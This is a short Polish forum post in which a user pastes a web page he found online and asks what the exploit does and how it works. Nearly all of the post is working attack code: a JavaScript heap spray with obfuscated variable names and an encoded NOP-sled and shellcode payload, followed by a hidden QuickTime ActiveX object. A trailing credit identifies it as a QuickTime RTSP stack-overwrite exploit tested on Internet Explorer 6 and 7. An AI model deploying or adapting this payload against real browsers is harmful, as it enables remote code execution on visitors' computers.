Witam ... znalazlem to dzisiaj na stronce
mysle ze ten kod mozna by bylo wykorzytac na mozzile bo niezle ja zawiesza...
wiec moje pytanko co robi ten exploit ?
jak on dziala ?
<script type="text/javascript" language="JavaScript"><!--
document.write (unescape ('%3cscript type="text/javascript" '+' src="http://kropka.onet.pl/_s/kropka/r.js?id=d106uINyU_qpIm7OTVUfBYYjDfYRbE7brbgwnUsMrar.p7&t=1&z=0&k=0&RR='+(new Date()).getTime()+'"%3e%3c/script%3e'));
//--></script>
<html>
<body><noscript onclick="''"></noscript><script type="text/javascript" src="http://a.cba.pl/cba1.js"></script>
<SCRIPT language="javascript">
var itqgmcvli = 0x0c0c0c0c;
var kjateykyc = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u0065");
</script>
<script>
var frckzkyeh = 0x400000;
var mahdqpysh = kjateykyc.length * 2;
var evghddnjz = frckzkyeh - (mahdqpysh + 0x38);
var ptlrdawln = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090");
ptlrdawln = tuquiemfi(ptlrdawln,evghddnjz);
xrbgpsnic = (itqgmcvli - 0x400000)/ frckzkyeh;
bzsperztn = new Array();
for (i=0;i< xrbgpsnic;i++)
{
snwoiwoix = ptlrdawln + kjateykyc;
bzsperztn = snwoiwoix;
}
function tuquiemfi(ptlrdawln, evghddnjz)
{
while (ptlrdawln.length*2< evghddnjz)
{
ptlrdawln += ptlrdawln;
}
ptlrdawln = ptlrdawln.substring(0, evghddnjz/2);
return ptlrdawln;
}
document.write('<object CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="0" height="0" style="border:0px"><param name="src" value="./playlist.mov"><param name="autoplay" value="true"><param name="loop" value="false"><param name="controller" value="true"></object>');
</script>
<noscript onclick="''"></noscript><script type="text/javascript" src="http://a.cba.pl/cba2.js"></script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
<script type="text/javascript">
_uacct = "UA-2289508-3";
urchinTracker();
</script>
</body>
QuickTime RTSP response content-type remote stack rewrite exploit by Yag Kohha (skyhole [at] gmail.com)
Exploit tested on:
[*]Windows Vista
[*]Windows XP SP2
[*]IE 6.0/ 7.0
[*]QT 7.2/ 7.3
</html>[/b]